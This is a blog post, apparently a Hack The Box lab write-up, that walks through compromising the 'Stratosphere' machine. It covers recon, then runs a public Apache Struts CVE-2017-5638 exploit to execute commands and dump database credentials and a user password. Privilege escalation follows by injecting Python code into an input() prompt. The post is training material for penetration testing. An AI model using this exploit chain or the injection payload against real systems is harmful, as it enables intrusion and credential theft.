HTB-Stratosphere Writeup

Heru Setiawan
Sep 3, 2018 · 5 min read
HackTheBox-Stratosphere

Hello Guys, the following is the stratosphere, this machine is very interesting and many unexpected things I found in it,

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

let’s just look and how to exploit this machine.

Nmap Scan

Lets see what Nmap gets??

root@kali:~#nmap -sV -sC 10.10.10.64 — open — reasonStarting Nmap 7.25BETA1 ( https://nmap.org ) at 2018–09–03 16:01 WIB
Nmap scan report for 10.10.10.64
Host is up, received echo-reply ttl 63 (0.32s latency).
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|_ 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
80/tcp open http syn-ack ttl 63
|_http-title: Stratosphere
8080/tcp open http-proxy syn-ack ttl 63
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Stratosphere

As we can see port 22,80 and 8080 are open, port 80 and 8080 have the same look, there is nothing interesting here, let’s continue with enumerating the directory deeper!

root@kali:~# gobuster -u http://10.10.10.64:8080 -w /root/wordlists/directory-list-2.3-medium.txtGobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.64:8080/
[+] Threads : 10
[+] Wordlist : /root/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
=====================================================
/manager (Status: 302)
/Monitoring (Status: 302)

And we get 2 directories, but / Monitoring is more interesting to me, when I go into it the web page is immediately redirected to this page:

http://10.10.10.64/Monitoring/example/Welcome.action
Figure 1. /Monitoring

Can nmap ensure this has vulnerabilities?? Let's see…

root@kali:~# nmap -Pn -p8080 — script http-vuln-cve2017–5638 — script-args path=/Monitoring/ 10.10.10.64Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018–09–04 02:14 WIB
Nmap scan report for 10.10.10.64
Host is up (0.40s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
| http-vuln-cve2017–5638:
| VULNERABLE:
| Apache Struts Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017–5638
| Apache Struts 2.3.5 — Struts 2.3.31 and Apache Struts 2.5 — Struts 2.5.10 are vulnerable to a Remote Code Execution

| vulnerability via the Content-Type header.
|
| Disclosure date: 2017–03–07
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
| https://cwiki.apache.org/confluence/display/WW/S2-045
|_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
Nmap done: 1 IP address (1 host up) scanned in 1.71 seconds

Yeaaa its Vulnerable!

Exploit Apache Struts

As we know .action is the Apache Struts extension, and many ways to exploit vulnerabilities in this application. And i found this exploit on Exploitdb.

Now we can test with command ‘id’ to ensure this exploit work.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring id
[*] CVE: 2017–5638 — Apache Struts2 S2–045
[*] cmd: id
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

yess its work! we can continue to enumerate more deeply and explore information that we can use to exploit this machine.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ ls
[*] CVE: 2017–5638 — Apache Struts2 S2–045
[*] cmd: ls
conf
db_connect
lib
logs
policy
webapps
work

db_connect file looks very interesting, let's see what it contains?

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ “cat db_connect”
[*] CVE: 2017–5638 — Apache Struts2 S2–045
[*] cmd: cat db_connect
[ssn]
user=ssn_admin
pass=AWs64@on*&
[users]
user=admin
pass=admin

After spending some time we move again by connecting to mysql to see information in the database.

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ ‘mysql -u admin -padmin -e “show databases”’
[*] CVE: 2017–5638 — Apache Struts2 S2–045
[*] cmd: mysql -u admin -padmin -e “show databases”
Database
information_schema
users

whats inside user??

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ ‘mysql -u admin -padmin -e “use users;show tables”’
[*] CVE: 2017–5638 — Apache Struts2 S2–045
[*] cmd: mysql -u admin -padmin -e “use users;show tables”
Tables_in_users
accounts

And we got User Richard!

root@kali:~/exploit/apache# python 41570.py http://10.10.10.64:8080/Monitoring/ ‘mysql -u admin -padmin -e “use users;select * from accounts”’
[*] CVE: 2017–5638 — Apache Struts2 S2–045
[*] cmd: mysql -u admin -padmin -e “use users;select * from accounts”
fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE⁵CK7k richard

Privilege Escalation And Get Root.txt

after getting richard user access, let's access SSH using User Richard

root@kali:~# ssh richard@10.10.10.64
richard@10.10.10.64’s password:
Linux stratosphere 4.9.0–6-amd64 #1 SMP Debian 4.9.82–1+deb9u2 (2018–02–21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 3 06:08:53 2018 from 10.10.14.46
richard@stratosphere:~$ ls
Desktop hashlib.py __pycache__ test.py user.txt

And we got user.txt, now lets see what inside test.py ?

richard@stratosphere:~$ cat test.py
#!/usr/bin/python3
import hashlib
def question():
q1 = input(“Solve: 5af003e100c80923ec04d65933d382cb\n”)
md5 = hashlib.md5()
md5.update(q1.encode())
if not md5.hexdigest() == “5af003e100c80923ec04d65933d382cb”:
print(“Sorry, that’s not right”)
return
print(“You got it!”)
q2 = input(“Now what’s this one? d24f6fb449855ff42344feff18ee2819033529ff\n”)
sha1 = hashlib.sha1()
sha1.update(q2.encode())
if not sha1.hexdigest() == ‘d24f6fb449855ff42344feff18ee2819033529ff’:
print(“Nope, that one didn’t work…”)
return
print(“WOW, you’re really good at this!”)
q3 = input(“How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n”)
md4 = hashlib.new(‘md4’)
md4.update(q3.encode())
if not md4.hexdigest() == ‘91ae5fc9ecbca9d346225063f23d2bd9’:
print(“Yeah, I don’t think that’s right.”)
return
print(“OK, OK! I get it. You know how to crack hashes…”)
q4 = input(“Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n”)
blake = hashlib.new(‘BLAKE2b512’)
blake.update(q4.encode())
if not blake.hexdigest() == ‘9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943’:
print(“You were so close! urg… sorry rules are rules.”)
return
import os
os.system(‘/root/success.py’)
return
question()

it looks like breaking a password, after spending some real time we just need to inject it into the following code :

import ('os'). system ('cat /root/root.txt') and we got the Root!

Figure 2. Getting root.txt

Byeee!

Heru Setiawan

Written by

IT Security Engineer | Indonesia

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade